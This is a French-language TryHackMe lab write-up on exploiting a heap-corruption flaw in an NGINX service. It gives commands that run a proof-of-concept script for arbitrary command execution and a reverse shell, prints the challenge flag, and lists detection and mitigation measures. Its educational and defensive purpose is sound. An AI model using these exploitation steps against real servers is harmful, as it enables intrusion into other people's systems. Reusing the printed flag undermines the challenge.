
Ce laboratoire démontre l'exploitation de la CVE-2024-24945, une vulnérabilité de corruption du tas affectant NGINX. L'objectif était de comprendre comment la corruption de la mémoire peut conduire à une exécution de code à distance (RCE) et d'acquérir une expérience pratique des techniques d'exploitation, de détection et d'atténuation.
Ce laboratoire illustre l'exploitation de CVE-2024-24945, une vulnérabilité de corruption du tas affectant NGINX. L'objectif était de comprendre comment une corruption mémoire peut conduire à une exécution de code à distance (RCE) et d'acquérir une expérience pratique des techniques d'exploitation, de détection et d'atténuation.
. Vérifier le service NGINX vulnérable. . Exécuter des commandes arbitraires à l'aide de la preuve de concept (PoC) fournie. . Obtenir un shell inversé sur le conteneur cible. . Récupérer le drapeau du défi. . Comprendre les stratégies de détection et d'atténuation.
. Plateforme : TryHackMe . Service cible : NGINX RIFT . Environnement conteneurisé : Docker . Outil d'exploitation : poc.py . Méthode d'accès : VNC (Virtual Network Computing)
Vérification du service
a confirmé que le conteneur vulnérable était en cours d'exécution et accessible.
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
backend ok
Exécution de la PoC fournie pour valider l'exécution de commandes arbitraires.
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
Vérification de l'exécution réussie :
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
Sortie : hello from depthfirst
Établissez un shell interactif sur le conteneur cible.
python3 poc.py --shell
Connexion réussie :
[] listening for reverse shell on port 1337... [] connected. $
Accès au drapeau du défi.
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
Les défenseurs peuvent identifier les tentatives d'exploitation via :
. Crash du worker NGINX . Événements de défaut de segmentation . Connexions réseau sortantes inattendues . Processus shell suspects (/bin/sh, bash) . Création de fichiers non autorisée dans les répertoires temporaires
. Mettez à niveau vers une version patchée de NGINX. . Appliquez le principe du moindre privilège. . Restreignez le trafic réseau sortant inutile. . Mettez en place une surveillance continue des journaux. . Utilisez des contrôles de sécurité des conteneurs et une surveillance en temps réel.
Ce laboratoire a fourni une expérience pratique pour :
. Comprendre les vulnérabilités de corruption du tas. . Exploitation des failles d'exécution de code à distance. . Établissement de shells inversés. . Réalisation d'une validation post-exploitation. . Reconnaissance des indicateurs de compromission et des techniques d'atténuation.
Cet exercice a été réalisé dans un environnement de laboratoire TryHackMe contrôlé à des fins éducatives et défensives de cybersécurité uniquement.
Auteur : [Benedict Ejepu Amaechi] Plateforme : TryHackMe Sujet : CVE-2024-24945 9NGINX RIFT0 Exploitation et Défense Date d'achèvement : Juin 2026